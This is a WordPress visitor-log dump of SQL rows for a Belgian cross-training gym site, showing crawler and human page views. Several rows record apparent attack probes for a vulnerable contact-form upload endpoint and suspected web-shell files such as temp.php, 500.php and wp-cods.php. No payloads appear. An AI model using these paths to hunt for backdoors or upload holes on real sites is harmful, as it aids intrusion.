(75655, 1497855742.853459, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75656, 1497868257.866928, 1109508276, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/index.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75657, 1497868694.106824, 1109508276, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75658, 1497871039.363472, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75659, 1497874371.340418, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75660, 1497877413.503281, 1463838565, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75661, 1497877700.992467, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75662, 1497878009.863660, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75663, 1497878221.961760, 919627301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(75664, 1497878222.667796, 919627301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(75665, 1497879545.697423, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75666, 1497881598.371809, 1375116803, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75667, 1497881599.853589, 1375116803, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75668, 1497881603.132743, 1375116803, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75669, 1497881628.625573, 1375116803, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75670, 1497881635.089626, 1375116803, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75671, 1497881804.229464, 1375116803, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75672, 1497881807.646874, 1375116803, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(75673, 1497886082.261099, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75674, 1497888499.505000, 2637637391, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75675, 1497888499.843673, 2637637391, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75676, 1497891018.442748, 2366148260, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75677, 1497895383.224098, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75678, 1497895383.687568, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75679, 1497895384.233105, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75680, 1497895384.636199, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75681, 1497895385.093455, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75682, 1497895385.602472, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75683, 1497895386.002716, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75684, 1497895386.426193, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75685, 1497895386.873547, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75686, 1497895387.275017, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75687, 1497895387.698700, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75688, 1497895388.178455, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75689, 1497895388.593424, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75690, 1497895389.009643, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75691, 1497904934.388177, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75692, 1497904935.058234, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75693, 1497904935.556362, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75694, 1497904936.045067, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75695, 1497904936.548897, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75696, 1497904937.147476, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75697, 1497904937.733644, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75698, 1497904938.273361, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75699, 1497904938.821266, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75700, 1497904939.376068, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75701, 1497904939.935811, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75702, 1497906173.147122, 1834526758, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9505 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(75703, 1497906175.121082, 1834526758, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9505 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(75704, 1497907153.936681, 1401300047, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75705, 1497909941.608707, 1314231423, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/console_contact_form/upload_file.php?files', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0)'),
(75706, 1497918206.198371, 621375758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75707, 1497922642.314474, 3475901815, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75708, 1497924020.162654, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75709, 1497924020.699376, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(75710, 1497935383.123692, 2637637391, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75711, 1497938720.235913, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75712, 1497938720.845372, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75713, 1497939765.381882, 1600959772, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75714, 1497939768.140262, 2366145549, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75715, 1497940239.390573, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75716, 1497942101.600872, 1123632419, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75717, 1497942102.839199, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75718, 1497942615.088626, 3024883604, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75719, 1497948809.483785, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75720, 1497949532.124999, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75721, 1497949532.869080, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75722, 1497949533.551968, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75723, 1497949534.239631, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75724, 1497949534.861061, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75725, 1497949535.547988, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75726, 1497949536.227452, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75727, 1497949536.829119, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75728, 1497949537.414342, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75729, 1497949538.005799, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75730, 1497949538.569499, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75731, 1497949552.381015, 632922577, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75732, 1497949555.093349, 632922577, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75733, 1497949559.080801, 632922577, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75734, 1497949853.020790, 1834596186, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(75735, 1497949867.204067, 1834596186, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(75736, 1497950360.673122, 1834596186, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(75737, 1497950364.913438, 1834596186, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(75738, 1497950414.454560, 1834596186, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(75739, 1497950441.306723, 1834596186, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(75740, 1497951619.509935, 695169303, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/500.php', 'http://crosstrainingcenter.be/wp-content/plugins/500.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75741, 1497953910.131650, 2366145606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75742, 1497954230.512794, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75743, 1497954230.992737, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(75744, 1497955199.449807, 1466596995, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(75745, 1497956999.300520, 878139038, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(75746, 1497957205.581939, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75747, 1497962530.844118, 2680913949, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75748, 1497962535.752168, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75749, 1497962537.553226, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75750, 1497962540.601780, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75751, 1497962546.031767, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75752, 1497962555.628221, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75753, 1497962560.419940, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75754, 1497962565.203469, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75755, 1497962570.836745, 2680913949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(75756, 1497963974.036750, 1834584698, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/54.0.2840.91 Mobile/14A403 Safari/602.1'),
(75757, 1497963976.198552, 1834584698, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/54.0.2840.91 Mobile/14A403 Safari/602.1'),
(75758, 1497969190.103926, 1123633950, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75759, 1497970098.845337, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75760, 1497970509.105215, 3475901731, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75761, 1497970559.520199, 2637637616, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75762, 1497973849.545575, 921557824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; linkdexbot/2.2; +http://www.linkdex.com/bots/)'),
(75763, 1497973849.617547, 921557824, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; linkdexbot/2.2; +http://www.linkdex.com/bots/)'),
(75764, 1497976515.388590, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75765, 1497976516.092346, 3652617281, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75766, 1497980006.795379, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75767, 1497980007.408679, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75768, 1497986486.817177, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75769, 1497986943.537856, 2509959832, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(75770, 1497986979.912183, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/ytt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75771, 1497987023.323484, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-cods.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75772, 1497987063.585568, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75773, 1497987064.725288, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(75774, 1497987191.217138, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
